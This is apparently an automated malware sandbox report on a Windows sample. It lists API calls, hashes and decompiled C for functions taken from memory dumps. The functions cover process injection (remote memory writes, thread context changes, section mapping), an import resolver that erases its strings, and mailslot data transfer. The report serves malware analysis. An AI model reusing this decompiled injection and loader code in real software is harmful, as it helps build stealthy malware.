  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
